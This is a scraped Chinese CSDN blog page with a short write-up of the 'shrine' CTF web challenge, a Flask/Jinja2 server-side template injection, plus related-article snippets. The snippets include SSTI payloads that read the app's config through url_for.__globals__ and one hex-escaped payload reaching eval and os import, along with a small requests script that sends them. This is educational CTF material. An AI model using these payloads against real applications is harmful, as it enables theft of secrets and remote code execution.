攻防世界-web-shrine(wp)

最新推荐文章于 2025-06-12 22:28:11 发布

SecRIO

最新推荐文章于 2025-06-12 22:28:11 发布

阅读量169

点赞数 2

文章标签： web安全网络安全经验分享

本文链接：https://blog.youkuaiyun.com/2301_80241182/article/details/143473871

版权

进入环境

发现jinja猜测可能存在SSTI，进行测试发现存在SSTI

但是def safe_jinjia(s)函数对输入进行了过滤，不能使用（）

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

SecRIO

关注关注

2
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

攻防世界-WEB

龙卷风摧毁停车场

04-09

2047

baby_web 题目提示说是尝试初始页面，也就是index.php但是直接访问还是会跳转到1.php，所以使用bp抓包，抓到index.php放到重发其里面查看显示状况，FLAG:flag{very_baby_web} Training-WWW-Robots 题目已经提示了是robots，直接在url后添加robots.txt就能访问，这个文件是规定哪些文件可以使用爬虫得到的，但是访问得到了一个flag的文件，直接复制，因为1和l我分不清，扔到url后面直接访问得到flag PHP2 打开url有一段

攻防世界-web高手进阶区

zji

04-25

6986

文章目录攻防世界-web高手进阶区一、baby_web二、Training-WWW-Robots1.引入库2.读入数据总结攻防世界-web高手进阶区提示：这里是记录web的题目，这里我基本不讲很多细节，请自行下载Burpsuite，web使用的等等工具。一、baby_web 非常的简单，bp抓包直接把1.php去掉后，就看的flag了。二、Training-WWW-Robots 非常的简单，点网页进去后，看到了robots.txt进去看到一个可以看到他有一个不允许访问的文件f10g.php，在

参与评论您还未登录，请先登录后发表或查看评论

攻防世界-web题型-3星难度汇总-个人wp

DamnVanish的博客

08-23

802

3星难度以及开始出现很多奇怪的解题方式了，大开眼界

攻防世界web进阶区shrine

gongjingege的博客

07-31

623

打开链接，查看源码代码审计看见了flask，考虑模板注入，@app.route后跟着路径，还有一部分过滤试一下 /shrine/{{1+1}},回显为2，确实是ssti app.config['FLAG'] = os.environ.pop('FLAG') 注册了一个config，flag应该就在这里面，本来可以直接查看{{config}}，但后面代码存在过滤 def safe_jinja(s): s = s.replace('(', '').replace(')', '')

攻防世界Web：shrine

Light_inthe_eyes的博客

10-16

207

打开页面后，是一段代码： import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/<path:shrine>') def shrine(shrine): def safe_jinj

攻防世界题目练习——Web引导模式（四）（持续更新）

qq_48550824的博客

11-07

685

以及服务相应的版本…等等，从而可以找到相应的漏洞。不知道这个admin是uname输入框还是passwd输入框变过来的，盲猜应该是uname，重新试一下改了一下passwd，但是发现并没有返回302结果，返回的是200，并且没有像上一个一样的this_is_your_cookie的Set-Cookie的值，猜测可能是因为用户名密码不正确？的讲解，“能够对外发起网络请求的地方，就可能存在 SSRF”，我的理解为：凡是一个输入框可以用来访问其他网站的，就可能存在ssrf漏洞。

攻防世界web进阶区shrine详解

hxhxhxhxx的博客

07-30

3361

攻防世界web进阶区shrine详解题目详解题目很明显给了一堆代码，我们将它整理一下 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read()\ @app.route('/shrine/') def shrine(shrine):

攻防世界 shrine

weixin_63640108的博客

06-07

566

构造payloads: /shrine/{{url_for.__globals__['current_app'].config['FLAG']}}的路径时,调用了safe_jinja替换了左右括号 '(' ')' 设置了黑名单'config' 'self' 尝试了url编码没用。python沙箱逃逸的方法是利用python对象之间的引用关系来调用被禁用的函数对象。: 当前的 Flask 应用实例，可以通过它访问应用的配置、路由、模板等。明确目标 FLAG在应该config['FLAG']中。

CTF_Web：攻防世界高手区进阶题WP（15-18）

AFCC_的博客（Web_Dog）

09-01

1209

0x15 easytornado 0x16 shrine 0x17 isc-05 题目描述：其他破坏者会利用工控云管理系统设备维护中心的后门入侵系统。这个题目提示了出现问题的地方在于设备维护中心页面，所以我们直接进去。 url为：http://111.200.241.244:63219/index.php?page=index 发现页面直接显示了index。基本page是输入什么回显什么，这里使用php伪协议读取文件源码试试php://filter/read=convert.base64-encode/

web安全-SSTI模板注入漏洞

weixin_61956136的博客

07-31

3999

web安全-SSTI模板注入漏洞

SSTI模板注入及绕过姿势(基于Python-Jinja2)

热门推荐

Y4tacker的博客

08-02

1万+

http://xmctf.top:8962/?name={{%22%22[%22\x5f\x5fclass\x5f\x5f%22]["\x5F\x5Fbase\x5F\x5F"]["\x5F\x5Fsubclasses\x5F\x5F"]()[233]["\x5F\x5Finit\x5F\x5F"]["\x5F\x5Fglobals\x5F\x5F"]["\x5F\x5Fbuiltins\x5F\x5F"]['eval']("\x5F\x5Fimport\x5F\x5F('os'))")}}

【网络安全】SRC漏洞挖掘思路/手法分享

等风来

06-03

655

本文总结了多个实用的渗透测试技巧，涵盖接口安全、权限管理、数据泄露等多个方面。主要包括：主机URL复制差异、GET请求并发实现、密码明文获取方法、文件上传黑名单绕过、优惠券逻辑漏洞测试、用户信息越权访问、多重参数修改越权、复杂ID收集技巧、参数删除实现越权、权限管理参数空值测试、Cookie参数越权、Host头修改越权、并发测试场景、HTTP方法滥用、前端限制绕过、分隔符注入攻击、脏数据绕过频率限制、数组参数篡改以及邀请权限提升漏洞等

《网络安全与防护》知识点复习

2301_79870359的博客

06-12

757

《网络安全与防护》知识点复习

秋招Day12 - 计算机网络 - 网络安全

weixin_54857540的博客

06-04

777

跨站请求伪造，挟持用户在当前已登陆的Web应用程序上执行非本意的操作。如何避免？检查请求头中规定Referer字段，Referer字段记录了HTTP请求的来源地址。在HTTP的请求参数中加入一个服务器随机生成的token，并在服务器端建立一个拦截器验证这个token，如果请求中没有token或者token内容不正确，就可能是CSRF攻击敏感操作多重校验，比如邮箱确认、验证码DoS就是Denial of Service，意思是拒绝服务。

网络安全之防病毒系统

anquan2233的博客

06-11

283

只要是继承了MyController都需要session但是后面有几个不需要鉴权的Controller除了MyController还有一个ApiController，此控制器下都是不需要鉴权的问题点用户注册来看用户相关的控制器UserController,前面的几个方法开头都需要获取session中的username或者eid，这些都不是我们可以利用的点往后看找到regUserAction方法，直接从request中获取了我们传入的参数进行解密。

RED DA认证-EN18031网络安全常见问题以及解答

2501_90322522的博客

06-12

532

A：在安全通信中，一般包括应用层基于TLS的加密，该部分涉及端侧和云侧，通讯模组厂家无法明确客户项目具体的加密协议、加密版本等技术细节，因此无法支持填写。A：通讯模组厂家仅能够提供模组的漏洞报告，无法提供客户产品漏洞报告，如客户未引入新的开源组件，则漏洞报告可以复用。A：威胁建模需要详细了解客户产品形态、工作逻辑/原理、接口、数据跨域交换以及工程措施，通讯模组厂家对客户产品掌握情况无法支持客户进行威胁建模，且通讯模组厂家的威胁建模客户也无法复用。A：仅直接出货至欧盟的设备需要RED DA认证。

Bugku-CTF-Web安全最佳刷题路线

ailx10

06-07

843

《CTF刷题路线：Web安全从入门到进阶》摘要：本文为网络安全爱好者提供Bugku-CTF平台Web安全方向的系统性刷题路线。按照难度系数划分为5个等级，涵盖基础到高阶的Web安全知识点。从简单的查看源代码、绕过前端限制等基础操作（难度1），到SQL注入、文件包含（难度3），再到XSS、反序列化等高级漏洞利用（难度4-5）。每道题目都标注了核心考察点，如Burp使用、PHP伪协议、Flask模板注入等，帮助学习者循序渐进掌握Web安全攻防技能。作者ailx10作为网络安全领域优秀答主，分享其整理的实战刷题

零基础在实践中学习网络安全-皮卡丘靶场（第十一期-目录遍历模块）

2404_89737060的博客

06-06

607

最适和新手学习的皮卡丘靶场教学

网络安全：OWASP防护守则

最新发布

xike1024的博客

06-12

632

全球最权威、最具影响力的Web应用安全风险清单OWASP Top 10 的防护守则

攻防世界shrine

03-14

### 关于 CTF 攻防世界 Shrine 的解题思路 #### 背景介绍 Shrine 是 CTF 平台攻防世界中的一个 Web 高手进阶题目，属于 Python Flask 模板注入（Template Injection）类别的漏洞利用挑战。该题目主要考察选手对 Jinja2 模板引擎的工作机制以及 Flask 应用程序内部结构的理解。 --- #### 已知条件分析 1. **路径行为**: 当访问 `/shrine/` 路径时，服务器会接收输入并将其传递给 `flask.render_template_string()` 函数处理[^3]。 2. **过滤逻辑**: 输入数据经过了一个名为 `safe_jinja()` 的自定义函数处理，目的是防止简单的模板注入攻击。 3. **目标**: 利用模板注入漏洞获取应用配置项中的敏感信息——即 Flag 值[^4]。 --- #### 技术细节解析 ##### 1. Flask 中的特殊变量与方法 Flask 提供了一些可以直接在 Jinja2 模板中调用的方法和对象，例如 `url_for`, `get_flashed_messages` 等。这些方法可以通过其属性 `. __globals__` 访问到应用程序上下文环境下的全局变量字典。通过以下 Payload 可以验证是否存在未被完全封堵的安全隐患： ```plaintext /shrine/{{ url_for.__globals__ }} ``` 上述请求返回的结果显示了全局变量字典的内容，其中包含了当前运行的应用实例 (`current_app`) 和其他重要信息。 ##### 2. 获取配置参数进一步深入挖掘可以发现，在 `current_app.config` 下存储着所有的配置键值对，其中包括我们需要提取的目标 Flag[^2]: ```plaintext {'FLAG': 'flag{shrine_is_good_ssti}'} ``` 因此最终有效的载荷应为如下形式之一： ```plaintext /shrine/{{ url_for.__globals__['current_app'].config }} ``` 或者替代方案： ```plaintext /shrine/{{ get_flashed_messages.__globals__['current_app'].config }} ``` 这两种方式均能成功触发漏洞并读取到隐藏的数据。 --- #### 实现过程总结整个解题流程围绕以下几个核心环节展开： - 明确入口点及其工作原理； - 探索可用资源 (如内置函数) 来突破防护措施； - 构造精确表达式定位至所需字段完成任务。以下是完整的 Python 测试脚本用于模拟发送恶意 URL 请求的过程： ```python import requests base_url = "http://example.com" payloads = [ "/shrine/{{url_for.__globals__['current_app'].config}}", "/shrine/{{get_flashed_messages.__globals__['current_app'].config}}" ] for p in payloads: response = requests.get(base_url + p) if "flag{" in response.text: print(f"[+] Found flag: {response.text.strip()}") break else: print("[!] No flags found.") ``` 注意替换实际地址前缀部分以便适配具体竞赛场景需求。 --- #### 安全建议针对此类风险开发人员应当采取严格白名单策略限定允许渲染字符串范围；同时启用沙盒模式限制潜在危险操作执行权限从而有效遏制类似威胁扩散蔓延趋势。 ---